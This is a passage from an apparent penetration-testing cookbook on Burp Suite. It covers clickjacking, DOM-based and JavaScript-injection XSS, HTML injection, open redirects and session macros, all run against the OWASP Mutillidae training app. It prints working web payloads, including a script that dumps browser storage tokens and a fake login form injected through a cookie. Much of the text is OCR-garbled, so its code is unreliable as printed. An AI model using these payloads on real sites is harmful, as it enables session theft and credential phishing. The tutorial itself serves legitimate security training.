tools. From the developer tools menu, select Console, and look for the 
prompt at the bottom: 


fd T i ons 


Release i 
Announcements PHP MyAdmin Console d Feature Requests 
PMA = 
Van v 
Ce O Inspector Œ Console (© Debugger {} Style Editor © Performance A} Memory = Network $ Storage <> DOM B x 
Ww Y Filter output [Persist Logs 


å The character encoding of the HTML document was not declared. The document will render with garbled text in some browser configurations if the index.php 


ee | aaa: 


5. At the Console prompt (for example, >>), paste into the prompt the 
Clickbandit script you copied to your clipboard: 


@« OWASP Mutillidae Il: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0(Hosed) Hints: Enabled (1 - 5cript Kidd1e) 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL Reset DB View Log View Captured Data 


Not Logged In 


CR Ci inspector ŒJ Console (© Debugger {} Style Editor (Œ, Performance 4} Memory = Network $ Storage <> DOM B3 
Ww Yy Filter output CD Persist Loc 


å The character encoding of the HTML document was not declared. The document will render with garbled text in some browser configurations if index.php 
the document contains characters from outside the US-ASCII range. The character encoding of the page must be declared in the document or in 
the transfer protocol. 


/* Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details. */ 
!function(){ 
var initialZoomFactor = ‘1.0', win, doc, width, height, clicks = [] 
function addClickTrap(element, minusY) { 
var clickTrap = doc.createElement('div'), cords = findPos(element); 


clickTrap.style.backgroundColor = ‘none’; 
clickTrap.style.border = ‘none'; 
clickTrap.style.position = ‘absolute’; 
clickTrap.style.left = cords[@] + 'px'; 
clickTrap.style.top = cords[1] + 'px'; 
clickTrap.style.width = element.offsetWidth + 'px'; 
clickTrap.style.height = element.offsetHeight + 'px'; 
if(element.zIndex || element.zIndex === '@') { 
clickTrap.style.zIndex = +element.zIndex+1; 


clickTrap.style.opacity = '@.5'; 

clickTrap.style.cursor = ‘pointer’; 

clickTrap.clickTrap = 1; 

clickTrap.addEventListener('click', function(e) { 
generatePoc({x:e.pageX, y: minusY?e.pageY-minusY : e.page}); 
e.preventDefault(); 
e.stopPropagation(); 
return false; 

}, true); 

doc. body. appendChild(clickTrap) ; 


function addMessage(msg) { 
var message = document.createElement('div'); 
macesca etvla width = '10a0a%'- 


6. After pasting in the script into the prompt, press the Enter key. You should 
see the Burp Clickbandit Record mode. Click the Start button to begin: 


€ C û © 192.168.56.101/mutillidae/index.php?page=home.php&popU} one Ww it © I 


BY BURPCLICKBANDIT O Sandbox iframe? Record mode 


O Disable click actions 


7. Start clicking around on the application after it appears. Click available 
links at the top Mutillidae menu, click available links on the side menu, or 
browse to pages within Mutillidae. Once you've clicked around, press the 
Finish button on the Burp Clickbandit menu. 

8. You should notice big red blocks appear transparently on top of the 
Mutillidae web pages. Each red block indicates a place where a malicious 
iframe can appear. Feel free to click each red block to see the next red block 
appear, and so on: 


E3 BURPCLICKBANDIT (@ 


Web Pwn in Mass Production 


Hints: Enabled (1 - 5cri1pt K1dd1e) 


Not Logged In 


ggle Security Enforce SSL Reset DB View Log View Captured Data 


y Vulnerable Web - n 


itillidae? Check out how to help 


9. Once you wish to stop and save your results, click the Save button. This 
will save the Clickjacking PoC in an HTML file for you to place inside your 
penetration test report. 


How it works... 


Since the Mutillidae application does not make use of the X-FRAME-OPTIONS 
header set to DENY, it is possible to inject a malicious iframe in to the Mutillidae 
web pages. The Clickbandit increases the level of opaqueness of the iframe for 
visibility and creates a proof of concept (PoC) to illustrate how the vulnerability 
can be exploited. 


Testing for DOM-based cross-site 
scripting 


The Document Object Model (DOM) is a tree-like structural representation of 
all HTML web pages captured in a browser. Developers use the DOM to store 
information inside the browser for convenience. As a web penetration tester, it is 
important to determine the presence of DOM-based cross-site scripting (XSS) 
vulnerabilities. 


Getting ready 


Using OWASP Mutillidae IT HTMLS web storage exercise, let’s determine 
whether the application is susceptible to DOM-based XSS attacks. 


How to do it... 


1. Navigate to OWASP 2013 | HTML5 Web Storage | HTMLS Storage: 


Version; 26.24 Security Level: (Hosea) Hints: Enabled (1 - er 


Home lini Toggle Hints Show Popup Hints Toggle Security Enforce SSL 


HTML) 


OWASP 2010 
OWASP 2007 


HTML § Storag 


ai Bak it 


HTML 5 Web Storage P HTML Storage 


2. Note the name/value pairs stored in the DOM using HTMLS5 Web Storage 
locations. Web storage includes Session and Local variables. Developers 


use these storage locations to conveniently store information inside a user's 
browser: 


HTML 5 Storage 


S Back Q Help Me! 


Hints 


HTML 5 Web Storage 


Web a 


St — 1 ie 
LocalStorageTarget This is set by the index.php page Local 
MessageOfTheDay Go Cats! Local 


| | @Session OLocal 


© Session Storage @ LocalStorage @ All Storage 


3. Switch to the Burp Proxy Intercept tab. Turn Interceptor on with the button 
Intercept is on. 

4. Reload the HTML 5 Web Storage page in Firefox browser by pressing F5 
or clicking the reload button. 


5. Switch to the Burp Proxy HTTP history tab. Find the paused request created 
by the reload you just performed. Note that the User -Agent string is 
highlighted, as shown in the following screenshot: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


intercept l HTTP history | WebSockets history | Options 


LF} Request to http://192.168.56.101:80 
| Forward || Drop | | Intercept is on Action 
f Raw | Params | Headers | Hex 


GET /mutillidae/index.php?page=html5-storage.php HTTP/1.1 
Host: 192.168.56.101 


5.0 (Windows NT 10.0; Winé4; x64; rv:6l.0) Gecko/20100101 Firefox/é1.0 | 

Accept: text/html,application/xhtml+xml ,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=password-generator . phpéusername=anonymous 

Cookie: showhints=1; PHPSESSID=9jsmnl7?vsn0mfe70ffv3vclkvl; acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 

Cache-Control: max-age=0 


6. Replace the preceding highlighted User-Agent with the following script: 


<script>try{var m = "";var 1 = window.localStorage; var s = 
window. sessionStorage; for(i=0;i<l.length;i++){var lKey = 
1l.key(i);m += lKey + "=" + 1l.getItem(lKey) + 
"*A\n";};for(i=0;i<s.length;i++){var lKey = s.key(i);m += lKey 
+ "=" + s.getItem(lKey) + ";\n";};alert(m);}catch(e) 
{alert(e.message) ; }</script> 


7. Click the Forward button. Now, turn Interceptor off by clicking the toggle 
button to Intercept is off. 
8. Note the alert popup showing the contents of the DOM storage: 


LocalStorageTarget=This is set by the index.php page; 
MessageOfTheDay=Go Cats! 

Secure, CurrentStateofHTML5Storage=Completely Insecure; 
Secure.|sUserLoggedin?=No; 

Secure. AuthenticationToken=DU837HHFYTEYUE9S 1934; 
SessionStorageTarget=This is set by the index.php page; 
AuthorizationLevel=0; 


How it works... 


The injected script illustrates how the presence of a cross-site scripting 
vulnerability combined with sensitive information stored in the DOM can allow 
an attacker to steal sensitive data. 


Testing for JavaScript execution 


JavaScript injection is a subtype of cross-site scripting attacks specific to the 
arbitrary injection of JavaScript. Vulnerabilities in this area can affect sensitive 
information held in the browser, such as user session cookies, or it can lead to 
the modification of page content, allowing script execution from attacker- 
controlled sites. 


Getting ready 


Using the OWASP Mutillidae II Password Generator exercise, let’s determine 
whether the application is susceptible to JavaScript XSS attacks. 


How to do it... 


1. Navigate to OWASP 2013 | A1 — Injection (Other) | JavaScript Injection | 
Password Generator: 


@« OWASP Mutillidae Il: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0(Hosed) Hints: Enabled (1-5cript Kiddie) Not Logged In 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL Reset DB View Log View Captured 


OWASP 2013 A1 - Injection (SQL) 


A1 - Injection (Other) HTML Injection (HTMLi) 


OWASP 2010 
A2 - Broken Authentication and HTMLi via HTTP Headers 


OWASP 2007 Session Management 
HTMLi Via DOM Injection 


: A3 - Cross Site Scripting (XSS 
Web Services Sais) HTMLi Via Cookie Injection 


A4 - Insecure Direct Object 


References Frame Source Injection 


Others A5 - Security Misconfiguration Command Injection 


Re ee A6 - Sensitive Data Exposure JavaScript Injection > Those "Back" Buttons 


HTTP Parameter Pollution > Password Generator 


A7 - Missing Function Level Access 


2. Note after clicking the Generate Password button, a password is shown. 
Also, note the username value provided in the URL is reflected back as 
is on the web page: http://192.168.56.101/mutillidae/index. php? 
page=password-generator . php&username=anonymous. This means a 
potential XSS vulnerability may exist on the page: 


| Password Generator 


SS Back Gg Help Me! 


Hints 


Password Generator 


Making strong passwords is important. 
Click the button below to generate a password. 


This password is for,anonymous | 


Password: P6/H%q8xOvQ6gh* 


Generate Password 


3. Switch to the Burp Proxy HTTP history tab and find the HTTP message 
associated with the Password Generator page. Flip to the Response tab in 
the message editor, and perform a search on the string catch. Note that the 
JavaScript returned has a catch block where error messages display to the 


user. We will use this position for the placement of a carefully crafted 
JavaScript injection attack: 


Target Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


Intercept WebSockets history | Options 


Logging of out-of-scope Proxy traffic is disabled 


Filter: Hiding CSS, image and general binary content 


# | Host | Method | URL | Params | Edited | Status 


| Length 


| MIME type 


_{ Raw [Headers Hex | mu Render 
+): 

</script> 

<script> 


function onSubmit0fGeneratorForm(/*HTMLFormElement*/ theForm){ 
tryt 


var 1PasswordText = ""; 
var 1PasswordCharset = “ABCDEFGHIJKLMNOPQRSTUVWXY Zabcde fghij kimnopgrst uvwxy 20123456789! GHSS°G*() -+=CV4 INI /:2"; 


for( var i=0; i < 15; i++ H 


1PasswordText += 1PasswordCharset .charAt (Math. floor(Math.random() * 1PasswordCharset . length) ); 
}// end for i 


document . getElement ById("idPasswordiInput").innerHTML = "Password: <span style=\"color: red; border-width: Ipx;border-color:black;\">" + 
"</span>"; 


document . getElement ById("idPasswordTableRow").style.display = ""; 
return false; 


catch(e) 


alert("Error: " + e.message); 


1/1 ena catch 
}// end function onSubmit0fGeneratorForm( /*HTMLFormElement*/ theForm) 
</script> 


<div class="page-title">Password Generator</div> 


<script type="text/javascript"> 
$(function() { 
$(' [HIMLEventReflectedXSSExecutionPoint]').attr("title", ""); 
$(' [HTMLEvent Re flectedXSSExecutionPoint]') balloon(); 
H: 
</script> 


<div style="margin: Spx;"> 
<span style="font-weight: bold; margin-right: SOpx;" HTMLEventReflectedXSSExecutionPoint="1"> 


4. Switch to the Burp Proxy Intercept tab. Turn Interceptor on with the button 
Intercept is on. 


5. Reload the Password Generator page in Firefox browser by pressing F5 or 
clicking the reload button. 


6. Switch to the Burp Proxy Interceptor tab. While the request is paused, note 
the username parameter value highlighted as follows: 


SS a ae 
[ntercept, | HTTP history | WebSockets history | Options 
(.#) Request to nttp:1192.168.56.101:80 


( Forward || Drop | { interceptison | | Action | 


GET /mutillidae/index.php?page=password-generator .php 
Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html,application/xhtmlt+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=html15-storage.php 


Cookie: showhints=l1; PHPSESSID=Sjsmnl7vsn0mfe70ffv3velkvl; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 


Upgrade-Insecure-Requests: 1l 
Cache-Control: max-age=0 


HTTP/1.1 


7. Replace the preceding highlighted value of anonymous with the following 


carefully crafted JavaScript injection script: 


canary"; }catch(e){}alert(1);try{a=" 


8. Click the Forward button. Now, turn Interceptor off by clicking the toggle 
button to Intercept is off. 

9. Note the alert popup. You’ve successfully demonstrated the presence of a 
JavaScript injection XSS vulnerability! 


How it works... 


The JavaScript snippet injected into the web page matched the structure of the 
original catch statement. By creating a fake name of canary and ending the 
statement with a semicolon, a specially crafted new catch block was created, 
which contained the malicious JavaScript payload. 


Testing for HTML injection 


HTML injection is the insertion of arbitrary HTML code into a vulnerable web 
page. Vulnerabilities in this area may lead to the disclosure of sensitive 
information or the modification of page content for the purposes of socially 
engineering the user. 


Getting ready 


Using the OWASP Mutillidae II Capture Data Page, let's determine whether the 
application is susceptible to HTML injection attacks. 


How to do it... 


1. Navigate to OWASP 2013 | A1 — Injection (Other) | HTMLi Via Cookie 
Injection | Capture Data Page: 


@« OWASP Mutillidae Il: Web Pwn in Mass Production 
Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 - Script Kiddte) Not Logged In l 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL Reset DB View Log View Captured 


OWASP 2013 A1 - Injection (SQL) 


A jection (Other) 
OWASP 2010 1 - Injection (Other) HTML Injection (HTMLI) 
A2 - Broken Authentication and HTMLi via HTTP Headers 


OWASP 2007 Session Management 
HTMLI Via DOM Injection 


Web Services A3 - Cross Site Scripting (XSS) 


HTMLi Via Cookie Injection > | Capture Data Page 


2. Note how the page looks before the attack: 


Capture Data 


S Back Q Help Me! 
Ò View Captured Data 


Data Capture Page 


This page is designed to capture any parameters sent and store them in a file and a 
database table. It loops through the POST and GET parameters and records them to a file 
named captured-data.txt. On this system, the file should be found at /tmp/captured- 
data.txt. The page also tries to store the captured data in a database table named 
captured_data and logs the captured data. There is another page named captured- 
data.php that attempts to list the contents of this table. 


The data captured on this request is: page = capture-data.php showhints = 1 
PHPSESSID = 9jsmn17vsn0mfe70ffv3vclkv1 acopendivids = 
swingset,jotto,phpbb2,redmine acgroupswithpersist = nada 


Would it be possible to hack the hacker? Assume the hacker will view the captured 
requests with a web browser. 


3. Switch to the Burp Proxy Intercept tab, and turn Interceptor on with the 
button Intercept is on. 

4. While the request is paused, make note of the last cookie, 
acgroupswitchpersist=nada: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
intercept | HTTP history | WebSockets history | Options 


4) Request to http://192.168.56.101:30 


Forward Drop | Intercept is on | Action 


Raw | Params | Headers | Hex 


GET /mutillidae/index.php?page=capture-data.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html,application/xhtmltxml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index-.php?page=back-button-discussion.php 
Cookie: showhints=1; PHPSESSID=Sjsmnl7vsn0mfe70ffv3velkvl; acopendivids=swingset ,jotto,phpbb2,redmine; acgroupswithpersist fnada] 
Connection: close 

Upgrade-Insecure-Requests: 1l 

Cache-Control: max-age=0 


5. While the request is paused, replace the value of the last cookie, with this 
HTML injection script: 


<hi>Sorry, please login again</hi><br/>Username<input 
type="text"><br/>Password<input type="text"><br/><input 
type="submit" value="Submit"><h1i>&nbsp; </h1> 


6. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 
7. Note how the HTML is now included inside the page! 


Capture Data 


S Back Q Help Me! 


F Hints 


Ò View Captured Data 


Data Capture Page 


This page is designed to capture any parameters sent and store them in a file and a 
database table. It loops through the POST and GET parameters and records them to a file 
named captured-data.txt. On this system, the file should be found at /tmp/captured- 
data.txt. The page also tries to store the captured data in a database table named 
captured_data and logs the captured data. There is another page named captured- 
data.php that attempts to list the contents of this table. 


The data captured on this request is: page = capture-data.php showhints = 1 
PHPSESSID = 9jsmn17vsn0mfe70ffv3vclkv1 acopendivids = 
swingset,jotto,pbhpbb2,redmine acgroupswithpersist = 


Sorry, please login again 


Username! 
Password 
Submit | 


How it works... 


Due to the lack of input validation and output encoding, an HTML injection 
vulnerability can exist. The result of exploiting this vulnerability is the insertion 
of arbitrary HTML code, which can lead to XSS attacks or social engineering 
schemes such as the one seen in the preceding recipe. 


Testing for client-side resource 
manipulation 


If an application performs actions based on client-side URL information or 
pathing to a resource (that is, AJAX call, external JavaScript, iframe source), the 
result can lead to a client-side resource manipulation vulnerability. This 
vulnerability relates to attacker-controlled URLs in, for example, the JavaScript 
location attribute, the location header found in an HTTP response, or a POST 
body parameter, which controls redirection. The impact of this vulnerability 
could lead to a cross-site scripting attack. 


Getting ready 


Using the OWASP Mutillidae II application, determine whether it is possible to 
manipulate any URL parameters that are exposed on the client side and whether 
the manipulation of those values causes the application to behave differently. 


How to do it... 


1. Navigate to OWASP 2013 | A10 — Unvalidated Redirects and Forwards | 
Credits: 


@% OWASP Mutillidae Il: Web Pwn in M 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 - Script 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL 


OWASP 2013 A1 - Injection (SQL) 


A1 - Injection (Other) Credits 


OWASP 2010 


A2 - Broken Authentication and 
OWASP 2007 Session Management Help Me! 


A4 - Insecure Direct Object Hints 
References 


»pwnized" Druin. Based on Mutillida 
Others AS - Security Misconfiguration 


Documentation A6 - Sensitive Data Exposure 


A7 - Missing Function Level Access 


Resources Control 


, A9 - Using Components with Known 
Getting Started: Reis 


Proj Whitepa . A10 - Unvalidated Redirects and >) Credits 


Forwards 


A8 - Cross Site Request Forgery 
(CSRF) 


Setup/reset the DB (Disabled: Not 
‘ta Admin) 


2. Click the ISSA Kentuckiana link available on the Credits page: 


S Back Q Help Me! 


Vv Hints 


Developed by Jeremy "webpwnized" Druin. Based on Mutillidae 1.0 from Adrian "Irongeek" 
Crenshaw. 


OWASP 

ISSA Kentuckiana 
OWASP Louisville 
Helpful Firefox Add-Ons 


3. Switch to the Burp Proxy HTTP history tab, and find your request to the 
Credits page. Note that there are two query string 
parameters: page and forwardur1. What would happen if we manipulated 
the URL where the user is sent? 


Target | Proxy Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
Intercept | HTTP history | WebSockets history 


Logging of out-of-scope Proxy traffic is disabled Re-enable 


Filter: Hiding CSS, image and general binary content 


GET /mutillidae/index.php?page=redirect andlog. phpé forvardurls=http: //wew. issa-kentuckiana.org HTTP/1.1 
i g 7 


fost: TST: Ler 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:€1.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.5é.101/mutillidae/index.php?page=credits. php 

Cookie: showhints=1; PHPSESSID=9jsmnl7vsnOmfe70ffv3vclkvl; acopendivids=swingset ,jotto,phpbb2,redmine; acgroupswithpersist=nada 


Connection: close 
Upgrade-Insecure-Requests: 1 


4. Switch to the Burp Proxy Intercept tab. Turn Interceptor on with the button 
Intercept is on. 


5. While the request is paused, note the current value of the fowardur1 
parameter: 


[intercent] HTTP history | WebSockets history | Options 


L) Request to http://192.168.56.101:80 


Forward Drop [ intercept is on | Action 


GET /mutillidae/index.php?page=redirectandlog. php 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.98 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=credits-php 


Cookie: showhints=1l; PHPSESSID=Sjsmnl7?vsnOmfe70ffv3velkvl; acopendivids=swingset,jotto,phpbbhl,redmine; acgroupswithpersist=nada 
Connection: close 


Upgrade-Insecure-Requests: 1 


6. Replace the value of the forwardur1 parameter to be 
https://www. owasp. org instead of the original choice of 
http://www. issa-kentuckiana.org: 


Target = Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
| [ nierceot | HTTP history | websockets history | Options 


| (4) Request to http1/192.168.56.101:80 


Forward Drop intercept is on | Action 


GET /mutillidae/index.php?page=redirectandlog. phpqforwardur1=} ttp www 

Host: 192.168.56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 

Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index-php?page=credits.php 

Cookie: showhints=1; PHPSESSID=Sjsmnl7vsnO0mfe70ffv3velkvl; acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersist=nada 
Connection: close 


Upgrade-Insecure-Requests: 1 


HITP/1-1 


7. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 


8. Note how we were redirected to a site other than the one originally clicked! 
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How it works... 


Application code decisions, such as where to redirect a user, should never rely 
on client-side available values. Such values can be tampered with and modified, 
to redirect users to attacker-controlled websites or to execute attacker-controlled 
scripts. 


Working with Burp Macros and 
Extensions 


In this chapter, we will cover the following recipes: 


e Creating session-handling macros 
e Getting caught in the cookie jar 

e Adding great pentester plugins 

e Creating new issues via Manual-Scan Issue Extension 
e Working with Active Scan++ Extension 


Introduction 


This chapter covers two separate topics that can also be blended together: 
macros and extensions. Burp macros enable penetration testers to automate 
events, such as logins or parameter reads, to overcome potential error situations. 
Extensions, also known as plugins, extend the core functionality found in Burp. 


Software tool requirements 


In order to complete the recipes in this chapter, you will need the following: 


e OWASP Broken Web Applications (VM) 

e OWASP Mutillidae 
(http://<Your_VM_Assigned_IP_Address>/mutillidae) 

e GetBoo (http://<Your_VM_Assigned_IP_Address>/getboo) 

e Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Creating session-handling macros 


In Burp, the Project options tab allows testers to set up session-handling rules. A 
session-handling rule allows a tester to specify a set of actions Burp will take in 
relation to session tokens or CSRF tokens while making HTTP Requests. There 
is a default session-handling rule in scope for Spider and Scanner. However, in 
this recipe, we will create a new session-handling rule and use a macro to help us 
create an authenticated session from an unauthenticated one while using 
Repeater. 


Getting ready 


Using the OWASP Miutilliae II application, we will create a new Burp Session- 
Handling rule, with an associated macro, to create an authenticated session from 
an unauthenticated one while using Repeater. 


How to do it... 


1. Navigate to the Login page in Mutillidae. Log into the application as 
username ed with password pentest. 

2. Immediately log out of the application by clicking the Logout button and 
make sure the application confirms you are logged out. 

3. Switch to the Burp Proxy HTTP history tab. Look for the logout request 
you just made along with the subsequent, unauthenticated GET request. 
Select the unauthenticated request, which is the second GET. Right-click and 
send that request to Repeater, as follows: 


Ti 
Login of cu--scape Poy fi abled Renal 


ie dng CSS, mage and genera binary cone 


tA tte leii URL Param Eid wus Leagh /TIMENype | Extent 


Hex 


GET /wubillidae/inder, php page= Login, phpdpoplllotafucationCode=L00L AMTP/l.1 
Host 192,168. 46.101 

User-Agent: Hozilla/3.0 (Windows NT 10.0; Wined; x64) rv:61.0) Gecko/20L0010) Piretor/el.0 
Accept: text/beal, application/shtal nm), anplication/gul,qe0.$,*/*; 20.6 Sando Sia 
Accept=Lanquage: enUS engl} 
Accept-Incoding: gzip, deflate l 
Deter: itp: //132.160. 86, 10L auti lidanden. phytpoptpoti ieationCodeel Tapia 
Cookie; shovkints=); PRPSESSTD=vwvériTueelvqrnéy fhgcSiph3; acopendividssevingset, Jotto phpbb? Santo hide CH! fa 
Connection: close 
Upgrade-InsecurePequests: | 


Doan ache san 


Sand Renee hi 


Sand Sequence 


4. Switch to Burp Repeater, then click the Go button. On the Render tab of the 
response, ensure you receive the Not Logged In message. We will use this 


scenario to build a session-handling rule to address the unauthenticated 
session and make it an authenticated one, as follows: 


Target | Proxy | Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
1 2x a 


Target: http://192.168,56.101 |. 
Request Response 


Raw | Headers | Hex | HTML | Render 


Raw | Params | Headers | Hex 

om TEENI H ndex. php? 
ol 

ehjin nt “nos tila 75.0 (W 


age=login. phpépopUpNoti ficationCode=LOUL HTTP/1.1 a 


lows NT 10.0; Winé4; 


tse x64; rv:61.0) Gecko/2 anole Firefox/él.0 IWASP M tillid II: WwW b P i M 
Accepts ext /bemh, appiication/rhtal+zai, applieation/aalsqe0.9,*/*420 utillidae 11: Web Fwn in Mass 
isa cept-Language: en-US a 4 

Accept-Encoding: gip, deflate Production 

Referer: http 166. $6. 101/mutillidae/index.php?popUpNot i ficationCode=AUL 

Co ; PHPSESSID=vyvérh7ueelvqraér thgé$iph3; 

al vingast, jecte pipid? SAE T 


6.24 Security Level: 0 (Hosed) Hints: Disabled (0 - I try harder) [ Not Loggedin | 


Conn: 
Uperase-Tes ecure anG 1 


5. Switch to the Burp Project options tab, then the Sessions tab, and click the 
Add button under the Session Handling Rules section, as follows: 


Target | Proxy | Spider 


Scanner | Intruder | Repeater 


[comestos | ar? | ss [ Sessan J usc | 


(2) Session Handling Rules 


(x3) You can define session handling rules to make Burp perform specific actions when making HTTP requests. Each rule has a defined scope (for particular tools, 
in to the application, or checking session validity. Before each request is issued, Burp applies in sequence each of the rules that are in-scope for the request. 


| Enabled | Description 


| Tools 


Edit 


Remove 


b 
Duplicate 


To monitor or troubleshoot the behavior of your session handling rules, you can use the sessions tracer to view in detail the results of processing each rule. 


Open sessions tracer 


6. After clicking the Add button, a pop-up box appears. Give your new rule a 


name, such as LogInSessionRule, and, under Rule Actions, select Run a 
macro, as follows: 


IB) Session handling rule editor w 


[2] Rule Description 


LoginSessionRule 


[2] Rule Actions 
The actions below wil be performed in sequence when this rule & applied to a request 


Use cookies from the session handing cookie jar 


Seta specific cook or parameter value 
Check session is valid b 


Run a macro 


Run a post-request macro | 
Invoke a Burp extension 


Ca ae 


7. Another pop-up box appears, which is the Session handling action editor. In 
the first section, under Select macro, click the Add button, as follows: 


B session handling action editor - LoglnSessionRule 


Select macro: 


Cc 


Necessary to issue it twice. 


@) Update current request with parameters matched from final macro response 
@ Update all parameters except for: 


a 
w 


( Tolerate URL mismatch when matching parameters (use for URL-agnostic CRSF tokens) 


© Update only the following parameters: 


@) Update current request with cookies from session handling cookie jar 
®© Update all cookies except for: 


O Update only the following cookies: 


C After running the macro, invoke a Burp extension action handler: 


[or 


(2) This action runs a predefined macro (sequence of requests) and optionally updates parameters and cookies in the current request based on the result of the 
macr 


Note that the request currently being processed by this session handling rule wil still be issued, so the macro should not include this request unless it is 


8. After clicking the Add button, the macro editor appears along with another 


pop-up of the Macro Recorder, as follows: 


a 


Select the items from the proxy history that you wish to include in the macro, and click "OK". Note that to record a macro now using your browser you Intercept is off 
will need to ensure that proxy interception is turned off. 


Logging of out-of-scope Proxy traffic is disabled 


Filter: Hiding CSS, image and general binary content | (2) 
# | Host | Method | URL | Params | Edited | Status | Length | MIMEtype | Extension 
1 http://192.168.56.101 GET /mutillidae/index.php?do=logout v 302 733 HTML php 
2 http://192.168.56.101 GET /mutillidae/index.php?page=login.php&p... v 200 47756 HTML php 
3 http:/192.168.56.101 POST /mutillidae/index.php?page=login.php v 302 47478 HTML php 
4 http://192.168.56.101 GET /mutillidae/index.php?popUpNotification... v 200 46417 HTML php 
El 1e 


Note: A bug exists in 1.7.35 that disables Macro Recorder. Therefore, after 
clicking the Add button, if the recorder does not appear, upgrade the Burp 
version to 1.7.36 or higher. 


9. Inside the Macro Recorder, look for the POST request where you logged in 
as Ed as well as the following GET request. Highlight both of those requests 
within the Macro Recorder window and click OK, as follows: 


(2) Macro Recorder 


Select the items from the proxy history that you wish to include in the macro, and click "OK". Note that to record a macro now using your browser you Intercept is off 
will need to ensure that proxy interception is turned off. 


Logging of out-of-scope Proxy traffic is disabled 


| Filter: Hiding CSS, image and general binary content | ES 
|æ a| Host | Method | URL | Params |Edited | Status | Length |MIMEtype | Extension 
[1 http://192.168.56.101 GET _/mutilidae/index.php?do=logout v 302 733 HTML php 

2 _hitp/192.168.56.101 GET __/mutilidae/index.php?page=login.php&p..__V 200 47756 HTML h 


{Raw | Params | Headers | Hex 


GET /mutillidae/index.php?popUpNotificationCode=AUL HTTP/1.1 la 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) GĢGecko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http: //192.168.56.101/mutillidae/index.php?page=login. phpépopUpNoti ficationCode=LOUL 
Cookie: showhints=0; username=ed; uid=24; PHPSESSID=vvvérh7ueelvqrmér fhgéSiph3; 
acopendivids=swingset ,jotto,phpbbl,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 
lv 


l-2- [nu L +] Lj Type a search term 0 matches 
E ee 


10. Those two highlighted requests in the previous dialog box now appear 


inside the Macro Editor window. Give the macro a description, such as 
LogInMacro, as follows: 


g| Macro Eaior | 


Use the configuration below to define the tems that are included in the macro, and the order they will be issued. You can configure how parameters and cookies are handled for each item. You can also test the macro to confirm it is 
working correctly. 


Macro description: | LoginMacro 


Macro items: 


1 ca | es 


POST /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168.56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/él1.0 

Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56. 101/mutillidae/index. php?page* login. phpspopUpNot i ficationCode*LOUL 

Content-Type: application/x-www- form-urlencoded 

Content-Length: 58 

Cookie: showhints#0; PHPSESSIDevvvérh7ueelvqrmér thgéSiph3; acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersistenada 
Connection: close 


